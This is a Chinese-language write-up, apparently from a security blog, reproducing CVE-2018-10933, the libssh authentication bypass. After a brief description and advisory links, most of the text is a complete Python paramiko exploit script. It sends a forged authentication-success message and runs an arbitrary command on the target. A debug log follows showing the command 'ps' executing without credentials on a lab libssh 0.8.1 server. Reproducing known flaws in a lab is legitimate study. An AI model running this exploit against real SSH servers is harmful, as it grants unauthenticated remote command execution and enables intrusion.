2018-10-16 libssh发布更新公告旨在解决CVE-2018-10933的问题
libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。 通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的 SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证。 进而可以进行一些恶意操作。
参考资料:
https://www.libssh.org/security/advisories/CVE-2018-10933.txt
https://www.seebug.org/vuldb/ssvid-97614
漏洞复现:
参考 https://www.seebug.org/vuldb/ssvid-97614 中给出的POC,我们编写一个简单的漏洞复现脚本:
#!/usr/bin/env python3 import sys import paramiko import socket import logging logging.basicConfig(stream=sys.stdout, level=logging.DEBUG) bufsize = 2048 def execute(hostname, port, command): sock = socket.socket() try: sock.connect((hostname, int(port))) message = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(message) client = transport.open_session(timeout=10) client.exec_command(command) # stdin = client.makefile("wb", bufsize) stdout = client.makefile("rb", bufsize) stderr = client.makefile_stderr("rb", bufsize) output = stdout.read() error = stderr.read() stdout.close() stderr.close() return (output+error).decode() except paramiko.SSHException as e: logging.exception(e) logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable") except socket.error: logging.debug("Unable to connect.") return None if __name__ == '__main__': print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
查看版本:
执行脚本:
xxxxxx@kali:~/data$ python3 CVE-2018-10933.py 192.168.3.5 2222 "ps" DEBUG:paramiko.transport:starting thread (client mode): 0x1982d050 DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.4.1 DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-libssh_0.8.1 INFO:paramiko.transport:Connected (version 2.0, client libssh_0.8.1) DEBUG:paramiko.transport:kex algos:['curve25519-sha256', 'curve25519-sha256@libssh.org', 'ecdh-sha2-nistp256', 'ecdh-sha2-nistp384', 'ecdh-sha2-nistp521', 'diffie-hellman-group14-sha1', 'diffie-hellman-group1-sha1'] server key:['ssh-rsa'] client encrypt:['chacha20-poly1305@openssh.com', 'aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] server encrypt:['chacha20-poly1305@openssh.com', 'aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] client mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] server mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] client compress:['none', 'zlib', 'zlib@openssh.com'] server compress:['none', 'zlib', 'zlib@openssh.com'] client lang:[''] server lang:[''] kex follows?False DEBUG:paramiko.transport:Kex agreed: ecdh-sha2-nistp256 DEBUG:paramiko.transport:HostKey agreed: ssh-rsa DEBUG:paramiko.transport:Cipher agreed: aes128-ctr DEBUG:paramiko.transport:MAC agreed: hmac-sha2-256 DEBUG:paramiko.transport:Compression agreed: none /home/e2a5e/.local/lib/python3.7/site-packages/paramiko/kex_ecdh_nist.py:39: CryptographyDeprecationWarning: encode_point has been deprecated on EllipticCurvePublicNumbers and will be removed in a future version. Please use EllipticCurvePublicKey.public_bytes to obtain both compressed and uncompressed point encoding. m.add_string(self.Q_C.public_numbers().encode_point()) /home/e2a5e/.local/lib/python3.7/site-packages/paramiko/kex_ecdh_nist.py:92: CryptographyDeprecationWarning: Support for unsafe construction of public numbers from encoded data will be removed in a future version. Please use EllipticCurvePublicKey.from_encoded_point self.curve, Q_S_bytes /home/e2a5e/.local/lib/python3.7/site-packages/paramiko/kex_ecdh_nist.py:103: CryptographyDeprecationWarning: encode_point has been deprecated on EllipticCurvePublicNumbers and will be removed in a future version. Please use EllipticCurvePublicKey.public_bytes to obtain both compressed and uncompressed point encoding. hm.add_string(self.Q_C.public_numbers().encode_point()) DEBUG:paramiko.transport:kex engine KexNistp256 specified hash_algo <built-in function openssl_sha256> DEBUG:paramiko.transport:Switch to new keys ... DEBUG:paramiko.transport:[chan 0] Max packet in: 32768 bytes DEBUG:paramiko.transport:[chan 0] Max packet out: 35000 bytes DEBUG:paramiko.transport:Secsh channel 0 opened. DEBUG:paramiko.transport:[chan 0] Sesch channel 0 request ok DEBUG:paramiko.transport:[chan 0] EOF received (0) DEBUG:paramiko.transport:[chan 0] EOF sent (0) PID TTY TIME CMD 1 ? 00:00:00 sh 6 ? 00:00:00 ssh_server_fork 8 ? 00:00:00 ssh_server_fork 9 ? 00:00:00 sh 10 ? 00:00:00 ps